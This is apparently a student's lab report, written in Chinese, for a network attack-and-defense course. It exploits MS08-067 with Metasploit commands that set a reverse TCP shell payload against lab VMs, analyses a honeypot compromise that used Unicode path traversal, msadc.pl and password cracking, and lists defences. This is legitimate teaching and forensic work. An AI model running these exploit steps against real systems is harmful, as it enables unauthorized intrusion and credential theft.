20222948 2022-2023-2 《网络攻防实践》第6周作业

实践六 Windows操作系统安全攻防

1.实践内容

1.1 实践任务

1.1.1 动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验
具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

1.1.2 取证分析实践：解码一次成功的NT系统破解攻击

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击；
攻击者如何使用这个破解工具进入并控制了系统；
攻击者获得系统访问权限后做了什么；
我们如何防止这样的攻击；
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么。

1.1.3 团队对抗实践：windows系统远程渗透攻击和分析

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

1.2 Windows的安全机制

身份验证是用于验证对象或个人身份的过程。对对象进行身份验证时，目标是验证该对象是真实的。在对某人进行身份验证时，目标是验证该人不是冒名顶替者。
在网络环境中，身份验证是向网络应用程序或资源证明身份的行为。通常，通过使用仅用户知道的密钥（如公共密钥密码学）或共享密钥的加密操作来证明身份。身份验证交换的服务器端将签名的数据与已知的加密密钥进行比较，以验证身份验证尝试。
Windows操作系统实现了一组默认的身份验证协议，包括Kerberos、NTLM、传输层安全性/安全套接字层（TLS / SSL）和摘要，作为可扩展体系结构的一部分。此外，某些协议被组合到身份验证包中，例如“协商”和“凭据安全支持提供程序”。这些协议和软件包可对用户，计算机和服务进行身份验证。身份验证过程进而使授权用户和服务能够以安全的方式访问资源。
当用户在凭据输入对话框中输入凭据时，登录过程就会开始。用户可以通过使用本地用户帐户或域帐户登录到计算机来执行交互式登录。

2.实践过程

2.1 动手实践Metasploit windows attacker

1、首先在kali虚拟机中打开metasploit。输入指令msfconsole：

2、接着输入指令：search ms08_067 搜索ms08_067漏洞情况：

输入命令use windows/smb/ms08_067_netapi，将ms08_067作为目标漏洞：
输入指令show payloads可以看到用于渗透攻击的路径：

3.输入指令： set payload generic/shell_reverse_tcp 设置攻击的载荷为tcp的反向连接：

输入指令：show options，展示渗透攻击需要设置的参数：

4.输入 show targets指令，可以展示渗透攻击的靶机的操作系统及版本：

5.输入指令：set LHOST 192.168.200.3 设置渗透攻击的主机是kali虚拟机：

输入指令：set RHOST 192.168.200.5设置渗透攻击的靶机是Win2k虚拟机：

6、输入 指令exploit ，开始渗透攻击：

输入指令ipconfig查看靶机自己的IP地址：
攻击成功。

2.2 取证分析实践：解码一次成功的NT系统破解攻击

1.用wireshark打开学习通上的.log文件：

输入条件：ip.dst ==172.16.1.106 and http进行筛选：
可以看到攻击机与靶机在TCP"三次握手"后建立了连接，同时发现靶机的操作系统为windows NT 5.0。

2.追踪tcp流：

发现攻击者打开了系统启动文件"boot.ini"，这里有%C0%AF字符，%C0%AF为/的Unicode编码，这里是Unicode编码攻击：
追踪第149号数据流，看到出现了类似于shell(“cmd /c echo”)的字符，说明攻击者通过shell指令对目标进行操作，进一步分析得知，还利用了RDS漏洞允许任意代码执行的缺陷进行了操作：

问1：攻击者使用了什么破解工具进行攻击？
上述指令均采用了Microsoft Access Driver (*.mdb)的驱动，使用了c:\winnt\help\iis\htm\tutorial\btcustmr.mdb这个dbq文件。根据ADM!ROX!YOUR!WORLD这个特征字符串，查询得知攻击者应该是利用了由rain forest puppy所编写的 msadc(2).pl渗透攻击代码发起的攻击。

问2：攻击者如何使用这个破解工具进入并控制了系统？
观察发现，每一次的攻击时间都很短，可见攻击者应该是先将指令写入了shell脚本，然后将这个脚本与msadc.pl攻击脚本一起执行的。
攻击者打开主机后，使用FTP的方式下载文件，使用samdunp拿到口令，再利用pdump.exe破解。在第四次破解，也就是打开IP地址为213.116.251.162的主机后，攻击者成功拿到了访问权限。

问3：攻击者获得系统访问权限后做了什么？
攻击者获得了IWAM_KENNY和IUSR_KENNY的账号，并试图获取本地Administrator用户权限。
为此，攻击者将破解的口令写入了yay.txt中，将用户写入到hec.txt文件中。还试图删除和拷贝har.txt文件。

问4:我们如何防止这样的攻击？
①禁用不需要的服务和端口；
②可以打开自动更新，及时更新和打补丁；
③防火墙封禁网络内部服务器发起的连接；
④使用 IIS Lockdown 和 URLScan 等工具加强 web server；
⑤设置强口令，增大破解口令的难度；
⑥定期检测以及修复漏洞，及时安装补丁。

问5：你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？
追踪186号数据包的数据流，可以看到如下信息：
echo best honeypot i’ve seen till now : ) > rfp.txt。
可以认为攻击者警觉了他的目标是一台蜜罐主机。

2.3 团队对抗实践：windows系统远程渗透攻击和分析

在进行这部分实验时用到的攻击机和靶机IP地址：
攻击机：192.168.200.3
靶机：192.168.200.4

1.将ms08_067作为漏洞进行攻击。

2.执行指令net user：

3.可以看到靶机里对应生成文件：
渗透成功。

3.学习中遇到的问题及解决

问题1：在进行渗透攻击时，攻击方无法ping通防守方的ip
解决方案：将kali攻击机设置成桥接模式，这样就可以让攻击机与靶机在同一网段内，以便渗透攻击的顺利进行。

问题2：set LHOST设置的是攻击主机的地址；set RHOST设置的是靶机的地址，要注意区分。

4.实践总结

本次实践主要学习了Windows的安全机制，以及渗透攻击的攻击过程，最后通过和另外一位同学一起模拟利用MS08-067漏洞进行远程渗透攻击，深刻理解了网络攻防的一般步骤，同时还要多加强理论知识的学习，并投入大量时间去实践，才能把网络攻防技术掌握的更好。